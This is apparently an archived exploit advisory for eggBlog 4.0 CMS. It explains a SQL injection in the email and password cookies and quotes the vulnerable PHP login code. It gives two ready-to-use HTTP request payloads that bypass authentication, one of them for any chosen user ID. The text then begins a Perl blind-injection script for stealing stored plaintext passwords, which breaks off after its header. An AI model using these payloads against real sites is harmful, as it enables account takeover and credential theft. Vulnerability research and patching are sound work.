1 # Author:
__GiReX__
2 # mySite:
girex.altervista.org
3 # Date:
27/03/2008 − 1/04/2008 Added exploit for str0ke
4
5 # CMS:
eggBlog 4.0
6 # Site:
eggblog.net
7
8 # Bug:
SQL Injection (cookie vars)
9 # Type: 1 − Admin/User Authentication Bypass
10
11 # Bug2:
Blind SQL Injection (same vars−query)
12 # Type:
Password retrieve exploit
13
14 # Var :
$_COOKIE[’email], $_COOKIE[’password’]
15 # Need:
magic_quotes_gpc = Off
16
17 # File: index.php
18
require_once "_lib/global.php";
19
...
20
eb_pre();
21
22 # File: /_lib/globals.php
23
require_once ’_lib/user.php’;
24
...
25
function eb_pre() {
26
...
27
if(isset($_COOKIE[’email’]) && isset($_COOKIE[’password’]) && !isset($_SESSION[’user_id’])) eb_login($_COOKIE[’ema
il’],$_COOKIE[’password’],1);
28
29 # Let we see function eb_login
30
31 # File: /_lib/user.php
32
function eb_login($email,$password,$key) {
33
...
34
if($key==0) $password=md5($password);
35
36 # Our $key is set to 1 so the password will not cprypted
37
38
$sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\"";
39
$query=mysql_query($sql);
40
41 # I have no words, 2 vars not sanizated into a SELECT query
42
43 PoC 1:
44
GET [PATH]/index.php HTTP/1.1
45
Host: [HOST]
46
...
47
Cookie: email=@" OR "1; password=@" OR "1
48
49 # With this you will be authenticated with the fist record of table eb_user
50
51 PoC 2:
Page 1/4
eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit
girex
04/01/2008
52
GET [PATH]/index.php HTTP/1.1
53
Host: [HOST]
54
...
55
Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID]
56
57 # For anybody you want
58
59 ##############################################################################################################
60 # Start Blind SQL Injection / Password retrieve exploit
#
61 # NOTE: Password is in plain−text so take a coffe...
#
62 ##############################################################################################################
63 #!/usr/bin/perl −w
64
65 # EggBlo